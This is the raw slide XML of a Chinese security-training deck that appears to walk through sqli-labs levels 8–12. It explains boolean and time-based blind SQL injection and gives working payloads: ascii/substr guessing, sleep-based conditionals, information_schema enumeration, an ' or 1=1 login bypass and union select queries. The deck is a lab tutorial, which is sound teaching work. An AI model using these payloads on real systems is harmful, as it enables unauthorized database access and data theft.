          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="8382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0" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="4256088"/>
            <a:ext cx="71127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1" name="Rectangle 209"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="304830" cy="2286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2" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888"/>
            <a:ext cx="406440" cy="3048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2540" y="2732088"/>
            <a:ext cx="8840070" cy="685800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59570" y="3494088"/>
            <a:ext cx="751914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118" name="图片 117" descr="掌控者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8865" y="1437005"/>
            <a:ext cx="3223895" cy="12636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449" y="355600"/>
            <a:ext cx="8685538" cy="4873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0E65E-9137-4309-8D78-B392A1917D52}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="8712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FB4DC4-41B9-4E61-AD6F-4DDEA2B4591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春秋广告/盗版必究        原创来源：http://chn.docer.com/works?userid=199329941#!/work_time"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519470" y="-2"/>
            <a:ext cx="8673163" cy="4336356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8672711"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX1" fmla="*/ 8672711 w 8672711"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX2" fmla="*/ 4336356 w 8672711"/>
              <a:gd name="connsiteY2" fmla="*/ 4336356 h 433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2711" h="4336356">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8672711" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336356" y="43363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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="10445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27" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="1044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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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38" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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39" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95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0" name="Rectangle 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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1" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920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2" name="Rectangle 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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3" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776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4" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687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5" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687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6" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776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7" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920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8" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065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9" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98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0" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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1" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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2" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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3" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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4" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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5" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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6" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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7" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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8" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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9" name="Rectangle 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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0" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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1" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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2" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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3" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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4" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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5" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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6" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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7" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="3810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30" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="152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31" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800"/>
            <a:ext cx="406440" cy="3048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711270" y="1295400"/>
            <a:ext cx="109230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550" y="6505575"/>
            <a:ext cx="111771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CFB4DC4-41B9-4E61-AD6F-4DDEA2B45915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00864" y="262255"/>
            <a:ext cx="8685538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" y="-2"/>
            <a:ext cx="12242310" cy="6933462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4035198" y="5682600"/>
            <a:ext cx="4183920" cy="550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讲师：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="0" strike="noStrike" spc="-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朝阳</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470078" y="4988520"/>
            <a:ext cx="3313440" cy="488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掌控安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-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44479" y="2564686"/>
            <a:ext cx="8239217" cy="860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en-US" altLang="zh-CN" sz="1800" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00206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3200" b="1" spc="-1" dirty="0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</a:rPr>
              <a:t>sql-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="-1" dirty="0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</a:rPr>
              <a:t>靶场原理详解（三）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第八关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479376" y="1484784"/>
            <a:ext cx="6948772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20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19250" y="1196340"/>
            <a:ext cx="87522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这一题我们还是按照之前的步骤，找注入点、找字段数、找显错位，发现这里根本没有显错位，这个时候我们就可以利用盲注的方法去尝试，先给各位同学介绍一下盲注中会涉及到的函数。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671320" y="2636912"/>
            <a:ext cx="88493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/>
              <a:t>布尔型盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>length() 函数 返回字符串的长度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substr() 截取字符串 （语法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>SUBSTR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str,pos,len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>） 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ascii() 返回字符的ascii码   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将字符变为数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>wei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/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时间型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>sleep() 将程序挂起一段时间n为n秒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if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>	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第八关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06945" y="1805902"/>
            <a:ext cx="91268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dirty="0"/>
              <a:t>?id=1' and (length(database()))=8 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe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1242695" y="2294255"/>
            <a:ext cx="35706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利用ASCII码猜解当前数据库名称：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18383" y="2762424"/>
            <a:ext cx="9744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dirty="0"/>
              <a:t>?id=1' and (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1)))=115-- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 返回正常，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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35710" y="3392170"/>
            <a:ext cx="98659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dirty="0"/>
              <a:t>?id=1' and (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),2,1)))=101-- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 返回正常，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e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08100" y="39325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猜表名：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235710" y="4256405"/>
            <a:ext cx="108375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?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101-- qwe 如果返回正常，说明数据库表名的第一个的第一位是e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228725" y="5570855"/>
            <a:ext cx="10445115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/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and (ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)))=105-- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i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1228725" y="51460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猜字段名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353820" y="1423035"/>
            <a:ext cx="9279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猜解库名长度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第九关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71905" y="2168525"/>
            <a:ext cx="91268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dirty="0"/>
              <a:t>?id=1' and if (length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>8,sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe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1242695" y="2654300"/>
            <a:ext cx="35706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利用ASCII码猜解当前数据库名称：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35710" y="3068955"/>
            <a:ext cx="97440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dirty="0"/>
              <a:t>?id=1' and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1))=115),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s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71905" y="3854074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猜表名：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235710" y="4178559"/>
            <a:ext cx="108375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?id=1' and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时，说明数据库表名的第一个的第一位是e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235710" y="5330449"/>
            <a:ext cx="104451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?id=1' and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i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1242695" y="4988819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猜字段名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44295" y="1155065"/>
            <a:ext cx="9881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同样按照盲注的手法，尝试后发现这里无论输入什么条件，回显的结果都是一个，这就证明不能再用刚刚布尔盲注的做法了，要尝试使用时间盲注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242695" y="1800225"/>
            <a:ext cx="9279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猜解库名长度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第十关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64920" y="1955800"/>
            <a:ext cx="91268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dirty="0"/>
              <a:t>?id=1" and if (length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>8,sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235710" y="2446655"/>
            <a:ext cx="35706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利用ASCII码猜解当前数据库名称：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208647" y="2814955"/>
            <a:ext cx="97440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dirty="0"/>
              <a:t>?id=1" and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1))=115),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s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228725" y="3437255"/>
            <a:ext cx="98659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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1" and if ((ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1,1))=101),sleep(5),1) -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 延时，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e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264920" y="43376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猜表名：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228725" y="4662170"/>
            <a:ext cx="108375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?id=1" and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时，说明数据库表名的第一个的第一位是e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228725" y="5814060"/>
            <a:ext cx="104451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?id=1" and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i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235710" y="54724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猜字段名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235710" y="1592580"/>
            <a:ext cx="9279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猜解库名长度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313815" y="1134745"/>
            <a:ext cx="10255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这题的做法跟之前是一样的，只是闭合的区别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第十一关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08100" y="1376680"/>
            <a:ext cx="8937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看到十一题首先就能发现，他的传参方式和以往是不同的，这次变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传参，但他们的注入方式是差不多的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98245" y="2348865"/>
            <a:ext cx="979614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尝试万能密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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判断字段数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1 order by 2 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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判断显错位：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select 1,2 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qwe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判断库名：'  union select 1,database() -- qwe</a:t>
            </a:r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判断表名：'union select 1,table_name from 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information_schema.tables where table_schema='security' -- qwe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判断列名：'union select 1,column_name from information_schema.columns where table_schema='security' and table_name='emails' -- qwe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判断数据：'union select 1,id from emails-- qwe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第十二关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00150" y="2096770"/>
            <a:ext cx="97961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尝试万能密码：</a:t>
